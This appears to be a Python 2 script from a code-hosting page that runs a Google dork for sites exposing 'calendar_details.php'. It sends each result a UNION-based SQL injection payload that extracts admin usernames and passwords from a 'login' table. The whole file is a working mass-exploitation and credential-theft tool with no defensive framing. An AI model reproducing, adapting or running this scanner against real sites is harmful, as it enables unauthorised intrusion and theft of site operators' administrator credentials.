-
Notifications
You must be signed in to change notification settings - Fork 43
/
Copy patheventcalendar_scanner.py
93 lines (70 loc) · 2.61 KB
/
eventcalendar_scanner.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
#coded by p1mps
import urllib2,httplib,sys,re
def StripTags(text):
finished = 0
while not finished:
finished = 1
start = text.find("<")
if start >= 0:
stop = text[start:].find(">")
if stop >= 0:
text = text[:start] + text[start+stop+1:]
finished = 0
return text
def tester(victim):
usernames_passes = []
print "testing " + victim
sql = "-26+union+select+0,0,concat(user_name,0x3a,user_pass),0,0,0,0,0,0,0+from+login--"
try:
print "[+] setting proxy"
proxy_handler = urllib2.ProxyHandler({'http': 'http://'+proxy+'/'})
opener = urllib2.build_opener(proxy_handler)
except:
print "Proxy:",proxy,"- Failed"
try:
req = urllib2.Request("http://"+victim+"?id="+sql)
req.add_header('User-Agent', "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4")
opener = urllib2.build_opener()
conn = urllib2.urlopen(req)
st = conn.read()
username_pass = re.findall("admin:[a-zA-Z|\d]+",st)
if len(username_pass) > 0:
usernames_passes.append(username_pass)
print "found:" + "http://"+victim+"?="+sql
except:
print "error"
return usernames_passes
def geturls(query,num):
print "[+] getting urls"
counter = 10
urls = []
while counter < int(num):
url = 'http://www.google.com/search?hl=en&q='+query+'&hl=en&lr=&start='+repr(counter)+'&sa=N'
#url = "http://search.lycos.com/?query="+query+"&page="+repr(counter)
opener = urllib2.build_opener(url)
opener.addheaders = [('User-agent', 'Mozilla/4.0 (compatible; MSIE 5.5; Windows NT)')]
data = opener.open(url).read()
print data
hosts = re.findall(('\w+\.[\w\.\-/]*\.\w+'),StripTags(data))
#hosts = re.findall('<span class=\"?grnLnk small\"?>http:\/\/(.+?)\/',data)
for x in hosts:
if x.find('www') != -1:
x = x[x.find('www'):]
if x not in urls and re.search("google", x) == None:
urls.append(x)
counter += 10
for url in urls:
print url
return urls
if len(sys.argv) <= 1:
print "Usage: ./eventcalendar_scanner.py -p proxy -n num"
sys.exit(1)
for arg in sys.argv:
if arg == "-p":
proxy = sys.argv[2]
if arg == "-n":
num = sys.argv[4]
urls = geturls("inurl:'calendar_details.php'",num)
#pass
for url in urls:
tester(url)